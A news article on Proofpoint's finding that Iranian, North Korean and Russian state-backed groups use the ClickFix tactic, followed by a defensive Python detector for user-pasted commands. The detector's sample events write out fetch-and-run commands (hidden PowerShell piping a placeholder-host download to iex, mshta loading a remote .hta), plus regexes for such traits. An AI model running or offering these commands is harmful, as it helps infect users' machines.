Security researchers have observed multiple state-sponsored hacking groups from Iran, North Korea, and Russia using the ClickFix social engineering tactic to deploy malware. The technique was already popular among cybercriminals, and its effectiveness seems to have caught the eye of some major hacking groups.
In a nutshell, ClickFix is a social engineering tactic that convinces a victim to infect their own machine by following a series of steps, often involving running a command in a terminal, under the guise of fixing a problem. Other excuses for getting users to run commands include solving a CAPTCHA and registering or verifying their device.
The adoption was spotted by researchers at Proofpoint Security, who claim in their report that the “technique will likely become more widely tested or adopted by state-sponsored actors.” Currently, ClickFix isn’t revolutionising entire campaigns, but is instead replacing the installation and execution stages in existing infection chains.
Researchers first spotted threat group Kimsuky, also tracked as TA427, using ClickFix in January and February in a phishing campaign targeting individuals “in fewer than five organisations in the think tank sector with a new infection chain.” Since then, other threat actors like MuddyWater and APT28 have also joined the party.

MuddyWater’s ClickFix campaign was much larger in scale compared to TA427. It targeted the finance, government, health, education, and transportation sectors in the Middle East, with a particular focus on Saudi Arabia and the United Arab Emirates (UAE). Some companies located in North America and Europe were also targeted.
Another popular campaign came from a Russian hacking group known as UNK_RemoteRogue towards the end of 2024. The campaign used fake emails sent from potentially compromised Zimbra servers, which included a link to a Microsoft Office document. This document contained instructions on how to run a command in Windows PowerShell. The command itself contained JavaScript that executed code linked with the Empire command-and-control framework.
Proofpoint’s report clearly shows state-sponsored hackers from multiple countries taking an interest in the ClickFix tactic to deploy malware at later stages in their respective attack chains. The tactic itself isn’t difficult to recognise: anyone with even a basic understanding of Windows terminal commands should be able to spot these commands a mile away. Even if you don’t understand Windows terminal commands, it’s never a good idea to run a random command you find on the internet, or worse, in your inbox, with admin permissions on your system.
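As an added illustration of how a defender might catch the pasted-command stage described above (example code written for this page, not taken from Proofpoint’s report), the Python snippet below scores constructed process-creation events: a script host started from the desktop or a user’s own shell, combined with traits common to pasted “fix” commands. The event layout, hostnames and regexes are assumptions, not indicators from any real campaign.

```python
import re

# Interactive launch points: the desktop / Run dialog (explorer.exe) and a
# user-opened shell. A ClickFix victim pastes the command into one of these.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}

# Command-line traits typical of pasted "fix" commands. These regexes are
# constructed for this example; tune them to your own telemetry.
TRAITS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "download_then_run": re.compile(
        r"(?:iwr|invoke-webrequest|downloadstring|curl)\b.*\b(?:iex|invoke-expression)\b", re.I),
    "remote_hta": re.compile(r"mshta(?:\.exe)?\s+https?://", re.I),
}

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> dict:
    """Score one process-creation event (parent image, image, command line)."""
    parent, image = basename(event["parent"]), basename(event["image"])
    traits = sorted(name for name, rx in TRAITS.items() if rx.search(event["cmdline"]))
    interactive = parent in INTERACTIVE_PARENTS and image in SCRIPT_HOSTS
    # A user starting PowerShell is normal admin activity on its own; alert
    # only when the pasted command also carries at least one of the traits.
    return {"interactive": interactive, "traits": traits,
            "suspicious": interactive and bool(traits)}

def scan(events: list) -> list:
    """Return the command lines that look like a user-pasted ClickFix command."""
    return [e["cmdline"] for e in events if classify(e)["suspicious"]]

# Constructed sample events in the shape of a Sysmon/EDR process-creation export.
# Hostnames are placeholders; none of this is taken from a real campaign.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr https://captcha.example.invalid/v.js | iex"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://fix.example.invalid/fix.hta"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Process"},
    {"parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))  # the two pasted-looking commands, not the admin's Get-Process
```

The third event shows the threshold at work: an administrator opening PowerShell from cmd.exe is interactive but carries no trait, so it is not flagged.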